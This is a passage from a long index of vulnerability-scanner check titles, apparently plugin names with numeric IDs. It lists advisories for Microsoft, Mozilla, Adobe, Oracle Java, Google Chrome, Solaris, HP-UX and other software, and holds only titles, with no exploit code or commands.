Dissector Buffer Overflow Vulnerability (Windows) [902193] Microsoft .NET Framework XML HMAC Truncation Vulnerability (981343) [902192] Microsoft Office COM Validation Remote Code Execution Vulnerability (983235) [902191] Microsoft Internet Explorer Multiple Vulnerabilities (982381) [902186] Mozilla Firefox Multiple Denial Of Service vulnerabilities (Windows) [902185] Mozilla Products 'IFRAME' Denial Of Service vulnerability (Windows) [902183] Microsoft Internet Explorer 'IFRAME' Denial Of Service Vulnerability [902182] Opera Browser Multiple Denial Of Service Vulnerability (Windows) [902178] Microsoft Visual Basic Remote Code Execution Vulnerability (978213) [902176] Microsoft SharePoint '_layouts/help.aspx' Cross Site Scripting Vulnerability [902167] Sun Java Deployment Toolkit Multiple Vulnerabilities (Windows) [902166] Microsoft Internet Explorer 'neutering' Mechanism XSS Vulnerability [902161] Adobe Acrobat and Reader PDF Handling Multiple Vulnerabilities (Windows) [902159] Microsoft VBScript Scripting Engine Remote Code Execution Vulnerability (980232) [902158] Microsoft Office Publisher Remote Code Execution Vulnerability (981160) [902157] Microsoft 'ISATAP' Component Spoofing Vulnerability (978338) [902156] Microsoft SMB Client Remote Code Execution Vulnerabilities (980232) [902155] Microsoft Internet Explorer Multiple Vulnerabilities (980182) [902151] Microsoft Internet Explorer Denial of Service Vulnerability - Mar10 [902149] Mozilla Products Multiple Vulnerabilities Mar-10 (Windows) [902147] Mozilla Firefox Unspecified Vulnerability Mar-10 (Windows) [902133] Microsoft Office Excel Multiple Vulnerabilities (980150) [902130] Mozilla Products Multiple Vulnerabilities feb-10 (Windows) [902128] Adobe Acrobat and Reader PDF Handling Code Execution Vulnerability (Windows) [902120] Google Chrome Multiple Vulnerabilities - (Windows) [902117] Microsoft DirectShow Remote Code Execution Vulnerability (977935) [902116] Microsoft Client/Server Run-time Subsystem Privilege Elevation Vulnerability (978037) [902115] Microsoft Kerberos Denial of Service Vulnerability (977290) [902114] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (975416) [902112] Microsoft SMB Client Remote Code Execution Vulnerabilities (978251) [902098] Novell iPrint Client Multiple Vulnerabilities (windows) [902095] Microsoft Office Excel Remote Code Execution Vulnerability (2269707) [902080] Microsoft Help and Support Center Remote Code Execution Vulnerability (2229593) [902075] XnView 'MBM' Processing Buffer Overflow Vulnerability (Windows) [902073] Google Chrome 'WebKit' Multiple Vulnerabilities (Windows) - June 10 [902069] Microsoft SharePoint Privilege Elevation Vulnerabilities (2028554) [902068] Microsoft Office Excel Remote Code Execution Vulnerabilities (2027452) [902060] Cybozu Office Authentication Bypass Vulnerability (Windows) [902045] aMSN session hijack vulnerability (Windows) [902044] aMSN Version Detection (Windows) [902039] Microsoft Visio Remote Code Execution Vulnerabilities (980094) [902038] Microsoft MPEG Layer-3 Codecs Remote Code Execution Vulnerability (977816) [902027] Mozilla Firefox Unspecified Vulnerability (Windows) [902015] Microsoft Paint Remote Code Execution Vulnerability (978706) [901210] Microsoft Office Privilege Elevation Vulnerability - 2721015 (Mac OS X) [901208] Microsoft Internet Explorer Multiple Vulnerabilities (2586448) [901206] Check RPC rstatd Service Running [901197] Google Chrome multiple vulnerabilities - March 11 (Windows) [901190] Google Chrome Use-After-Free Vulnerability (Windows) [901182] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2479628) [901181] Windows Client/Server Run-time Subsystem Privilege Elevation Vulnerability (2476687) [901180] Microsoft Internet Explorer Multiple Vulnerabilities (2482017) [901174] OpenSC Version Detection (Windows) [901173] Windows Backup Manager Remote Code Execution Vulnerability (2478935) [901166] Microsoft Office Remote Code Execution Vulnerabilites (2423930) [901165] Windows Common Control Library Remote Code Execution Vulnerability (2296011) [901162] Microsoft Internet Explorer Multiple Vulnerabilities (2360131) [901161] Microsoft ASP.NET Information Disclosure Vulnerability (2418042) [901153] Google Chrome multiple vulnerabilities Sep-10 (Windows) [901151] Microsoft Internet Information Services Remote Code Execution Vulnerabilities (2267960) [901145] FreeType Unspecified Vulnerability (Windows) [901144] FreeType Version Detection (Windows) [901143] FreeType Memory Corruption and Buffer Overflow Vulnerabilities (Windows) [901142] FreeType Multiple denial of service vulnerabilities (Windows) [901139] Microsoft Internet Explorer Multiple Vulnerabilities (2183461) [901120] Microsoft IIS Authentication Remote Code Execution Vulnerability (982666) [901097] Microsoft Internet Explorer Multiple Vulnerabilities (978207) [901095] Microsoft Embedded OpenType Font Engine Remote Code Execution Vulnerabilities (972270) [901082] IBM DB2 UDB Multiple Unspecified Vulnerabilities (Windows) [901069] Microsoft Office Project Remote Code Execution Vulnerability (967183) [901047] MS Windows License Logging Server Remote Code Execution Vulnerability (974783) [901041] Microsoft Internet Explorer Multiple Code Execution Vulnerabilities (974455) [901039] Vulnerabilities in Windows Media Runtime Could Allow Remote Code Execution (975682) [900973] Microsoft Office Word Remote Code Execution Vulnerability (976307) [900964] Microsoft .NET Common Language Runtime Code Execution Vulnerability (974378) [900944] Microsoft IIS FTP Server 'ls' Command DOS Vulnerability [900929] Microsoft JScript Scripting Engine Remote Code Execution Vulnerability (971961) [900898] Microsoft Internet Explorer 'XSS Filter' XSS Vulnerabilities - Nov09 [900897] Microsoft Internet Explorer PDF Information Disclosure Vulnerability - Nov09 [900891] Microsoft Internet Denial Of Service Vulnerability - Nov09 [900887] Microsoft Office Excel Multiple Vulnerabilities (972652) [900878] Microsoft Products GDI Plus Code Execution Vulnerabilities (957488) [900874] Microsoft IIS FTP Service Remote Code Execution Vulnerabilities (975254) [900863] Microsoft Internet Explorer 'window.print()' DOS Vulnerability [900837] Microsoft DHTML Editing Component ActiveX Remote Code Execution Vulnerability (956844) [900836] Microsoft Internet Explorer Address Bar Spoofing Vulnerability [900826] Microsoft Internet Explorer 'location.hash' DOS Vulnerability [900813] Microsoft Remote Desktop Connection Remote Code Execution Vulnerability (969706) [900809] Microsoft Visual Studio ATL Remote Code Execution Vulnerability (969706) [900808] Microsoft Visual Products Version Detection [900799] Ruby Interpreter Version Detection (Windows) [900752] XnView DICOM Parsing Integer Overflow Vulnerability (Windows) [900741] Microsoft Internet Explorer Information Disclosure Vulnerability Feb10 [900725] Ruby Interpreter Heap Overflow Vulnerability (Windows) - Dec09 [900724] Windows XP 'SPI_GETDESKWALLPAPER' DoS Vulnerability [900711] Microsoft IIS WebDAV Remote Authentication Bypass Vulnerability [900690] Microsoft Virtual PC/Server Privilege Escalation Vulnerability (969856) [900689] Microsoft Embedded OpenType Font Engine Remote Code Execution Vulnerabilities (961371)) [900670] Microsoft Office Excel Remote Code Execution Vulnerabilities (969462) [900669] Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (968537) [900668] Vulnerability in RPC Could Allow Elevation of Privilege (970238) [900602] RPC portmapper [900589] Microsoft ISA Server Privilege Escalation Vulnerability (970953) [900588] Microsoft DirectShow Remote Code Execution Vulnerability (961373) [900567] Microsoft IIS Security Bypass Vulnerability (970483) [900566] Microsoft Active Directory LDAP Remote Code Execution Vulnerability (969805) [900479] PostgreSQL Version Detection (Windows) [900476] Microsoft Excel Remote Code Execution Vulnerabilities (968557) [900461] Microsoft MSN Live Messneger Denial of Service Vulnerability [900445] Microsoft Autorun Arbitrary Code Execution Vulnerability (08-038) [900400] Microsoft Internet Explorer Unicode String DoS Vulnerability [900391] Microsoft Office Publisher Remote Code Execution Vulnerability (969516) [900366] Microsoft Internet Explorer Web Script Execution Vulnerabilites [900365] Microsoft Office Word Remote Code Execution Vulnerabilities (969514) [900337] Microsoft Internet Explorer Denial of Service Vulnerability - Apr09 [900328] Microsoft Internet Explorer Remote Code Execution Vulnerability (963027) [900322] Tor Replay Attack Vulnerability (Windows) [900314] Microsoft XML Core Service Information Disclosure Vulnerability [900303] Microsoft Internet Explorer HTML Form Value DoS Vulnerability [900302] MS Windows taskmgr.exe Information Disclosure Vulnerability [900299] Microsoft Report Viewer Information Disclosure Vulnerability (2578230) [900298] MS Windows Remote Access Service NDISTAPI Driver Privilege Elevation Vulnerability (2566454) [900294] Microsoft Data Access Components Remote Code Execution Vulnerabilities (2560656) [900288] Microsoft Distributed File System Remote Code Execution Vulnerabilities (2535512) [900287] Microsoft SMB Client Remote Code Execution Vulnerabilities (2536276) [900285] Microsoft Foundation Class (MFC) Library Remote Code Execution Vulnerability (2500212) [900283] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2506223) [900282] Microsoft DNS Resolution Remote Code Execution Vulnerability (2509553) [900279] Microsoft SMB Client Remote Code Execution Vulnerabilities (2511455) [900278] Microsoft Internet Explorer Multiple Vulnerabilities (2497640) [900273] Microsoft Remote Desktop Client Remote Code Execution Vulnerability (2508062) [900267] Microsoft Media Decompression Remote Code Execution Vulnerability (2447961) [900262] Microsoft Internet Explorer Multiple Vulnerabilities (2416400) [900261] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (2293386) [900246] Microsoft Media Decompression Remote Code Execution Vulnerability (979902) [900245] Microsoft Data Analyzer and IE Developer Tools ActiveX Control Vulnerability (980195) [900229] Microsoft Data Analyzer ActiveX Control Vulnerability (978262) [900228] Microsoft Office (MSO) Remote Code Execution Vulnerability (978214) [900223] Microsoft Ancillary Function Driver Elevation of Privilege Vulnerability (956803) [900218] IBM DB2 Server Detection (Windows) [900192] Microsoft Internet Explorer Information Disclosure Vulnerability [900187] Microsoft Internet Explorer Argument Injection Vulnerability [900170] Microsoft iExplorer '&NBSP [900131] Microsoft Internet Explorer Denial of Service Vulnerability [900128] CuteNews Version Detection for Windows [900125] Microsoft SQL Server 2000 sqlvdir.dll ActiveX Buffer Overflow Vulnerability [900123] Apple iTunes Version Detection for Windows [900120] Microsoft Organization Chart Remote Code Execution Vulnerability [900097] Vulnerability in Microsoft DirectShow Could Allow Remote Code Execution [900095] Microsoft ISA Server and Forefront Threat Management Gateway DoS Vulnerability (961759) [900094] Vulnerabilities in Windows Could Allow Elevation of Privilege (959454) [900093] Microsoft DirectShow Remote Code Execution Vulnerability (961373) [900092] Windows HTTP Services Could Allow Remote Code Execution Vulnerabilities (960803) [900086] Vulnerabilities in Windows Kernel Could Allow Remote Code Execution (958690) [900080] Vulnerabilities in Microsoft Office Visio Could Allow Remote Code Execution (957634) [900079] Vulnerabilities in Microsoft Exchange Could Allow Remote Code Execution (959239) [900064] Vulnerability in Microsoft Office SharePoint Server Could Cause Elevation of Privilege (957175) [900063] Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution (957173) [900061] Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (959070) [900060] Vulnerabilities in Windows Media Components Could Allow Remote Code Execution (959807) [900058] Microsoft XML Core Services Remote Code Execution Vulnerability (955218) [900052] Windows Internet Printing Service Allow Remote Code Execution Vulnerability (953155) [900051] Windows Kernel Elevation of Privilege Vulnerability (954211) [900049] Host Integration Server RPC Service Remote Code Execution Vulnerability (956695) [900048] Microsoft Excel Remote Code Execution Vulnerability (956416) [900047] Microsoft Office nformation Disclosure Vulnerability (957699) [900046] Microsoft Office Remote Code Execution Vulnerabilities (955047) [900045] Windows Media Player 11 Remote Code Execution Vulnerability (954154) [900044] Windows Media Encoder 9 Remote Code Execution Vulnerability (954156) [900036] Opera Version Detection for Windows [900034] Windows Messenger Could Allow Information Disclosure Vulnerability (955702) [900033] Microsoft PowerPoint Could Allow Remote Code Execution Vulnerabilities (949785) [900029] Microsoft Office Filters Could Allow Remote Code Execution Vulnerabilities (924090) [900028] Microsoft Excel Could Allow Remote Code Execution Vulnerabilities (954066) [900025] Microsoft Office Version Detection [900012] Enumerates List of Windows Hotfixes [900006] Microsoft Word Could Allow Remote Code Execution Vulnerability [900004] Microsoft Access Snapshot Viewer ActiveX Control Vulnerability [900003] Apple Safari Detect Script (Windows) [900002] Apple Safari for Windows Multiple Vulnerabilities July-08 [900001] Opera for Windows Unspecified Code Execution Vulnerabilities July-08 [860852] Fedora Update for libtirpc FEDORA-2008-1017 [860389] Fedora Update for libtirpc FEDORA-2008-9204 [855770] Solaris Update for rpc.nisd 140917-02 [855741] Solaris Update for rpc.nisd 140918-02 [855685] Solaris Update for rpc.nisd 140917-01 [855672] Solaris Update for rpc.nisd 140918-01 [855563] Solaris Update for /usr/lib/netsvc/rwall/rpc.rwalld 112847-01 [855554] Solaris Update for librpcsvc 127549-01 [855522] Solaris Update for librpcsvc 127548-01 [855518] Solaris Update for rpc.ypupdated 139986-01 [855515] Solaris Update for usr/sbin/rpc.metad 139967-01 [855503] Solaris Update for rpcsec_gss 126929-02 [855466] Solaris Update for OpenWindows 3.6.1 108117-06 [855441] Solaris Update for ypserv/ypxfrd/rpc.yppasswdd 114342-12 [855436] Solaris Update for rpc.ypupdated 138886-01 [855419] Solaris Update for librpcsvc 123397-01 [855408] Solaris Update for rpc.ypupdated 138575-01 [855393] Solaris Update for OpenWindows 3.6.2 111626-04 [855385] Solaris Update for rpc.ypupdated 140102-01 [855364] Solaris Update for librpcsvc 123396-01 [855334] Solaris Update for OpenWindows 3.6.2 113792-01 [855317] Solaris Update for /usr/lib/netsvc/rwall/rpc.rwalld 112875-01 [855246] Solaris Update for OpenWindows 3.7.3 119903-02 [855227] Solaris Update for /usr/lib/netsvc/rwall/rpc.rwalld 112846-01 [855223] Solaris Update for usr/sbin/rpc.metad 138574-01 [855208] Solaris Update for rpc.ypupdated 138576-01 [855196] Solaris Update for NFS Daemon, rpcmod 113278-22 [855173] Solaris Update for OpenWindows 3.7.0 112811-02 [855158] Solaris Update for rpcsec_gss 126928-02 [855128] Solaris Update for rpc.ypupdated 138885-01 [855124] Solaris Update for nfs and rpcmod 116960-21 [855123] Solaris Update for nfs and rpcmod 116959-21 [855098] Solaris Update for NFS Daemon, rpcmod 119439-15 [855057] Solaris Update for OpenWindows 3.6.2 110286-16 [855014] Solaris Update for usr/sbin/rpc.metad 140106-01 [841137] Ubuntu Update for xmlrpc-c USN-1527-2 [840391] Ubuntu Update for xmlrpc-c vulnerabilities USN-890-5 [840163] Ubuntu Update for krb5, librpcsecgss vulnerability USN-511-2 [840047] Ubuntu Update for krb5, librpcsecgss vulnerability USN-511-1 [835182] HP-UX Update for rpcbind HPSBUX02370 [835143] HP-UX Update for rpc.yppasswdd HPSBUX00242 [835134] HP-UX Update for rpcbind Software HPSBUX00169 [835116] HP-UX Update for rpc.ypupdated HPSBUX01002 [835113] HP-UX Update for rpc.mountd HPSBUX00272 [835102] HP-UX Update for rpc.yppasswdd HPSBUX02295 [835100] HP-UX Update for rpc.ttdbserverd HPSBUX00168 [835057] HP-UX Update for RPC HPSBUX00252 [835039] HP-UX Update for RPC HPSBUX01020 [835012] HP-UX Update for rpc.ttdbserver HPSBUX00199 [830306] Mandriva Update for librpcsecgss MDKSA-2007:181 (librpcsecgss) [803479] Adobe Acrobat Multiple Vulnerabilities - Windows [803456] Adobe Air Multiple Vulnerabilities - December12 (Windows) [803454] Adobe Air Multiple Vulnerabilities - November12 (Windows) [803451] Adobe Air Multiple Vulnerabilities - October 12 (Windows) [803354] Mozilla Thunderbird Multiple Vulnerabilities-02 November12 (Windows) [803353] Mozilla SeaMonkey Multiple Vulnerabilities-02 November12 (Windows) [803352] Mozilla Thunderbird ESR Multiple Vulnerabilities-01 November12 (Windows) [803351] Mozilla Thunderbird Multiple Vulnerabilities-01 November12 (Windows) [803350] Mozilla SeaMonkey Multiple Vulnerabilities-01 November12 (Windows) [803349] Mozilla Firefox ESR Multiple Vulnerabilities-01 November12 (Windows) [803347] Mozilla Firefox ESR Code Execution Vulnerabilities - November12 (Windows) [803336] Oracle Java SE JDK Multiple Vulnerabilities - February 2012 (Windows - 03) [803335] Oracle Java SE JDK Multiple Vulnerabilities - February 2012 (Windows - 02) [803334] Oracle Java SE JDK Multiple Vulnerabilities - February 2012 (Windows - 01) [803127] Google Chrome Multiple Vulnerabilities-03 Dec2012 (Windows) [803121] Google Chrome Multiple Vulnerabilities-02 Dec2012 (Windows) [803118] Google Chrome Multiple Vulnerabilities-01 Dec2012 (Windows) [803103] Oracle VM VirtualBox Unspecified Denial of Service Vulnerability (Windows) [803102] Pidgin MXit Message Parsing Buffer Overflow Vulnerability (Windows) [803086] LibreOffice XML Manifest Handling Buffer Overflow Vulnerabilities (Windows) [803084] LibreOffice Graphic Object Loading Buffer Overflow Vulnerability (Windows) [803083] OpenOffice Multiple Buffer Overflow Vulnerabilities - Dec12 (Windows) [803081] Adobe Photoshop Camera Raw Plug-in Code Execution Vulnerabilities (Windows) [803074] Adobe Flash Player Multiple Vulnerabilities - December12 (Windows) [803070] Wireshark Multiple Dissector Multiple Vulnerabilities - Dec12 (Windows) [803068] Wireshark Multiple Dissector Multiple DoS Vulnerabilities - Dec12 (Windows) [803064] LibreOffice Import Files Denial of Service Vulnerabilities (Windows) [803061] Mozilla Firefox Code Execution Vulnerabilities - November12 (Windows) [803059] Mozilla Firefox Multiple Vulnerabilities - November12 (Windows) [803057] Mozilla Firefox Multiple Vulnerabilities-02 November12 (Windows) [803055] Mozilla Firefox Multiple Vulnerabilities-01 November12 (Windows) [803047] Apple QuickTime Multiple Vulnerabilities - Nov12 (Windows) [803044] Adobe Flash Player Multiple Vulnerabilities - November12 (Windows) [803043] RealPlayer Watch Folders Function Buffer Overflow Vulnerability (Windows) [803040] Mozilla Firefox Multiple Vulnerabilities - November12 (Windows) [803038] Google SketchUp '.SKP' File Memory Corruption Vulnerability (Windows) [803028] Microsoft Internet Explorer Remote Code Execution Vulnerability (2757760) [803025] Adobe Photoshop PNG Image Processing Buffer Overflow Vulnerabilities (Windows) [803021] Oracle Java SE JRE AWT Component Unspecified Vulnerability - (Windows) [803020] Oracle Java SE JRE Multiple Remote Code Execution Vulnerabilities - (Windows) [803017] Mozilla Firefox Multiple Vulnerabilities - August12 (Windows) [803015] Mozilla Firefox Multiple Vulnerabilities - August12 (Windows) [803013] Mozilla Products Memory Corruption Vulnerabilities - August12 (Windows) [803011] Mozilla Products Multiple Vulnerabilities - August12 (Windows) [803001] Opera Multiple Vulnerabilities - August12 (Windows) [802996] Mozilla Firefox 'WebSockets' Denial of Service Vulnerability (Windows) [802994] Mozilla Firefox Multiple Vulnerabilities-01 (Windows) [802991] Mozilla Firefox Security Bypass Vulnerabilities - Oct 12 (Windows) [802989] Mozilla Firefox Multiple Vulnerabilities - Oct 12 (Windows) [802986] Adobe Flash Player Multiple Vulnerabilities - October 12 (Windows) [802985] VERITAS Backup Exec Remote Agent Windows Servers BOF Vulnerability [802978] Wireshark LDP PPP and HSRP dissector Multiple Vulnerabilities (Windows) [802975] Google Chrome Windows Kernel Memory Corruption Vulnerability [802972] Google Chrome Multiple Vulnerabilities - Sep12 (Windows-01) [802962] Apple iTunes Multiple Vulnerabilities - Sep 12 (Windows) [802960] Adobe LiveCycle Designer Untrusted Search Path Vulnerability (Windows) [802954] Adobe Reader Multiple Unspecified Vulnerabilities - Windows [802952] Adobe Flash Player Multiple Vulnerabilities -01 August 12 (Windows) [802951] Oracle Java SE Java Runtime Environment Multiple Unspecified Vulnerabilities(02) - (Windows) [802950] Oracle Java SE Java Runtime Environment Unspecified Vulnerability - (Windows) [802949] Oracle Java SE Java Runtime Environment Multiple Unspecified Vulnerabilities(01) - (Windows) [802948] Oracle Java SE Java Runtime Environment Multiple Unspecified Vulnerabilities - (Windows) [802947] Oracle Java SE Java Runtime Environment Code Execution Vulnerability - (Windows) [802945] Wireshark Multiple Vulnerabilities(01) - August 2012 (Windows) [802944] Wireshark Multiple Vulnerabilities - August 2012 (Windows) [802943] Wireshark GSM RLC MAC dissector Buffer Overflow Vulnerability (Windows) [802940] Adobe Flash Player Font Parsing Code Execution Vulnerability - (Windows) [802938] Adobe Shockwave Player Multiple Vulnerabilities - August 2012 (Windows) [802936] Adobe Reader Multiple Vulnerabilities - Windows [802935] Pidgin 'Libpurple' Cipher API Information Disclosure Vulnerability (Windows) [802932] Google Chrome PDF Viewer Multiple Vulnerabilities (Windows) [802928] Google Chrome Multiple Vulnerabilities - August 12 (Windows) [802925] Apple Safari Multiple Vulnerabilities - Aug 2012 (Windows) [802922] VLC Media Player OGG Demuxer Buffer Overflow Vulnerability (Windows) [802920] VLC Media Player 'MP4' Denial of Service Vulnerability (Windows) [802917] Google Chrome Multiple Vulnerabilities(01) - July 12 (Windows) [802912] Microsoft Unauthorized Digital Certificates Spoofing Vulnerability (2728973) [802907] Wireshark Multiple Denial of Service Vulnerabilities - July 12 (Windows) [802906] Pidgin MSN and XMPP Denial of Service Vulnerabilities (Windows) [802898] Wireshark PPP And NFS Dissector Denial of Service Vulnerabilities (Windows) [802895] Mozilla Products Memory Corruption Vulnerabilities - July12 (Windows) [802893] Mozilla Products Certificate Page Clickjacking Vulnerability (Windows) [802891] Mozilla Firefox Multiple Vulnerabilities - July12 (Windows) [802889] Mozilla Products Multiple Vulnerabilities - July12 (Windows) [802886] Microsoft Sidebar and Gadgets Remote Code Execution Vulnerability (2719662) [802880] Google Chrome Multiple Vulnerabilities - July 12 (Windows) [802871] Adobe Flash Player Multiple Vulnerabilities June-2012 (Windows) [802869] Mozilla Products 'jsinfer.cpp' Denial of Service Vulnerability (Windows) [802865] Mozilla Products Multiple Vulnerabilities - June12 (Windows) [802864] Microsoft XML Core Services Remote Code Execution Vulnerability (2719615) [802848] Google Chrome Multiple Denial of Service Vulnerabilities - May 12 (Windows) [802842] Mozilla Products Security Bypass Vulnerability - May12 (Windows) [802840] Mozilla Products Multiple Vulnerabilities - May12 (Windows) [802835] Google Chrome Multiple Vulnerabilities-02 - April 12 (Windows) [802831] EMC NetWorker 'nsrexecd' RPC Packet Denial of Service Vulnerability [802820] Mozilla Products Multiple Vulnerabilities - Mar12 (Windows) [802811] Adobe Flash Player Multiple Vulnerabilities (Windows) - Mar12 [802807] Google Chrome Multiple Denial of Service Vulnerabilities - March12 (Windows) [802806] Microsoft IIS Default Welcome Page Information Disclosure Vulnerability [802803] Adobe Flash Player Multiple Vulnerabilities (Windows) - Feb12 [802796] Apple Safari Webkit Multiple Vulnerabilities - May 12 (Windows) [802795] Apple QuickTime Multiple Vulnerabilities - (Windows) [802792] Google Chrome Multiple Vulnerabilities - May 12 (Windows) [802790] Adobe Illustrator Multiple Unspecified Vulnerabilities (Windows) [802782] Adobe Photoshop BOF and Use After Free Vulnerabilities (Windows) [802781] Adobe Flash Professional JPG Object Processing BOF Vulnerability (Windows) [802779] Adobe Shockwave Player Multiple Code Execution and DoS Vulnerabilities (Windows) [802774] Microsoft VPN ActiveX Control Remote Code Execution Vulnerability (2695962) [802772] Adobe Flash Player Object Confusion Remote Code Execution Vulnerability (Windows) [802761] Wireshark Multiple Vulnerabilities - April 12 (Windows) [802760] Wireshark IEEE 802.11 Dissector Denial of Service Vulnerability (Windows) [802759] Wireshark Multiple Denial of Service Vulnerabilities - April 12 (Windows) [802748] Adobe Reader Multiple Vulnerabilities April-2012 (Windows) [802732] Google Chrome Multiple Vulnerabilities - April 12 (Windows) [802726] Microsoft SMB Signing Disabled [802722] VLC Media Player Multiple Vulnerabilities - Mar 12 (Windows) [802717] Google Chrome 'History navigation' Arbitrary Code Execution Vulnerability (Windows) [802714] Google Chrome 'GPU process' Multiple Vulnerabilities (Windows) [802713] Pidgin Multiple Denial of Service Vulnerabilities (Windows) [802708] Microsoft Internet Explorer Code Execution and DoS Vulnerabilities [802700] Google Chrome 'HTTP session' Information Disclosure Vulnerability (Windows) [802684] IBM Director CIM Server CIMListener Directory Traversal Vulnerability (Windows) [802681] Oracle Java SE Hash Collision DoS Vulnerability (Windows) [802680] Oracle Java SE 'MurmurHash' Algorithm Hash Collision DoS Vulnerability (Windows) [802670] PHP pdo_sql_parser.re 'PDO' extension DoS vulnerability (Windows) [802652] Opera URL Processing Arbitrary Code Execution Vulnerability (Windows) [802649] Opera Multiple Denial of Service Vulnerabilities - June12 (Windows) [802646] Opera Multiple Vulnerabilities - June12 (Windows) [802612] Oracle Java SE JRE Multiple Vulnerabilities - February 2012 (Windows - 03) [802611] Oracle Java SE JRE Multiple Vulnerabilities - February 2012 (Windows - 02) [802610] Oracle Java SE JRE Multiple Vulnerabilities - February 2012 (Windows - 01) [802600] IBM SPSS SamplePower 'VsVIEW6' ActiveX Control Multiple Code Execution Vulnerabilities (Windows) [802597] Google Chrome Multiple Vulnerabilities - February 12 (Windows 01) [802594] Google Chrome Multiple Vulnerabilities - February 12 (Windows) [802592] Mozilla Products XBL Binding Memory Corruption Vulnerability - (Windows) [802591] PHP 'magic_quotes_gpc' Directive Security Bypass Vulnerability (Windows) [802590] PHP 'php_register_variable_ex()' Remote Code Execution Vulnerability (Windows) [802581] Mozilla Products Multiple Unspecified Vulnerabilities - Feb12 (Windows 01) [802580] Mozilla Products Multiple Unspecified Vulnerabilities - Feb12 (Windows) [802579] Mozilla Products IPv6 Literal Syntax Cross Domain Information Disclosure Vulnerability (Windows) [802566] PHP Multiple Denial of Service Vulnerabilities (Windows) [802562] Strawberry Perl Modules Multiple Vulnerabilities (Windows) [802558] Adobe Reader/Acrobat Multiple Memory Corruption Vulnerabilities - Windows [802557] LibreOffice 'DOC' File Denial of Service Vulnerability (Windows) [802547] Mozilla Firefox Cache Objects History Enumeration Weakness Vulnerability (Windows) [802545] Mozilla Products Multiple Information Disclosure Vulnerabilities - (Windows) [802542] Adobe Reader/Acrobat 'U3D' Component Memory Corruption Vulnerability - Windows [802540] Adobe Flash Player 'SWF' File Multiple Code Execution Vulnerability - Windows [802518] Mozilla Products XSS and Memory Corruption Vulnerabilities (Windows) [802517] Mozilla Products Privilege Escalation Vulnerabily (Windows) [802511] Mozilla Products Multiple Vulnerabilities (Windows) [802510] Mozilla Products Browser Engine Denial of Service Vulnerabilities (Windows) [802509] Mozilla Products 'NoWaiverWrapper' Privilege Escalation Vulnerability (Windows) [802508] Adobe Shockwave Player Multiple Vulnerabilities (Windows) - Nov 2011 [802505] FFFTP Untrusted Search Path Vulnerability (Windows) [802504] PHP 'is_a()' Function Remote Arbitrary Code Execution Vulnerability (Windows) [802503] Wireshark CSN.1 Dissector Denial of Service Vulnerability (Windows) [802502] Wireshark Heap Based BOF and Denial of Service Vulnerabilities (Windows) [802499] Apple Safari Webcore Webkit 'XSSAuditor.cpp' XSS Vulnerability (Windows) [802496] Google Chrome Webcore Webkit 'XSSAuditor.cpp' XSS Vulnerability (Windows) [802490] Google Chrome Multiple Vulnerabilities - Nov2012 (Windows) [802488] VLC Media Player 'libpng_plugin' Denial of Service Vulnerability (Windows) [802485] Adobe Shockwave Player Multiple Vulnerabilities Nov-2012 (Windows) [802482] Oracle Java SE JRE Multiple Unspecified Vulnerabilities-04 oct12 (Windows) [802481] Oracle Java SE JRE Multiple Unspecified Vulnerabilities-03 oct12 (Windows) [802480] VLC Media Player TiVo Demuxer Double Free Vulnerability (Windows) [802479] Oracle Java SE JRE Multiple Unspecified Vulnerabilities-02 oct12 (Windows) [802478] Oracle Java SE JRE Multiple Unspecified Vulnerabilities-01 Oct (Windows) [802473] Google Chrome Multiple Vulnerabilities-02 Oct12 (Windows) [802470] Google Chrome Multiple Vulnerabilities-01 Oct12 (Windows) [802468] Compatibility Issues Affecting Signed Microsoft Binaries (2749655) [802462] Microsoft ActiveSync Null Pointer Dereference Denial Of Service Vulnerability [802451] Google Chrome Multiple Vulnerabilities - Sep12 (Windows) [802450] Opera Address Bar Spoofing Vulnerability (Windows) [802444] XnView Multiple Image Decompression Heap Overflow Vulnerabilities (Windows) [802443] XnView PSD Record Type Parsing Integer Overflow Vulnerabilities (Windows) [802435] Opera 'X.509' Certificates Spoofing Vulnerability (Windows) [802420] VLC Media Player '.amr' File Denial of Service Vulnerability (Windows) [802403] MS Windows Fraudulent Digital Certificates Spoofing Vulnerability (2641690) [802398] Adobe Shockwave Player Multiple Vulnerabilities - Feb 2012 (Windows) [802395] Opera Large Integer Argument Denial of Service Vulnerability (Windows) [802374] Google Chrome Multiple Denial of Service Vulnerabilities - January12 (Windows) [802365] Opera Cache History Information Disclosure Vulnerability (Windows) [802363] Opera Multiple Information Disclosure Vulnerabilities (Windows) [802361] Opera Multiple Vulnerabilities - December11 (Windows) [802358] Google Chrome Cache History Information Disclosure Vulnerabilities (Windows) [802355] Google Chrome Multiple Information Disclosure Vulnerabilities (Windows) [802349] PHP EXIF Header Denial of Service Vulnerability (Windows) [802345] Google Chrome Multiple Vulnerabilities - November11 (Windows) [802343] ChaSen Buffer Overflow Vulnerability (Windows) [802340] EtherApe RPC Packet Processing Denial of Service Vulnerability [802338] Google Chrome Mozilla Network Security Services Privilege Escalation Vulnerability (Windows) [802332] Opera Extended Validation Information Disclosure Vulnerabilities (Windows) [802330] PHP Multiple Vulnerabilities (Windows) - Sep 2011 [802326] Google Chrome multiple vulnerabilities - September11 (Windows) [802316] Google Chrome Multiple Vulnerabilities - August11 (Windows) [802314] Ecava IntegraXor Multiple Cross-Site Scripting Vulnerabilities (Windows) [802313] Google Picasa JPEG Image Processing Remote Code Execution Vulnerability (Windows) [802309] XnView File Search Path Executable File Injection Vulnerability (Windows) [802303] Google Chrome WebGL Texture Information Disclosure Vulnerability (Windows) [802300] Tor Directory Authority 'policy_summarize' Denial of Service Vulnerability (Windows) [802292] IBM Informix Dynamic Server 'oninit.exe' Buffer Overflow Vulnerability (Windows) [802287] Microsoft Internet Explorer Cache Objects History Information Disclosure Vulnerability [802286] Microsoft Internet Explorer Multiple Information Disclosure Vulnerabilities [802284] Apple Safari JavaScript Implementation Information Disclosure Vulnerability (Windows) [802282] Apple Safari WebKit Information Disclosure Vulnerability (Windows) [802278] Oracle Java SE Java Runtime Environment Unspecified Vulnerability - October 2011 (Windows) [802277] Oracle Java SE Java Runtime Environment Unspecified Vulnerability - October 2011 (Windows) [802276] Oracle Java SE Multiple Vulnerabilities - October 2011 (Windows04) [802275] Oracle Java SE Multiple Vulnerabilities - October 2011 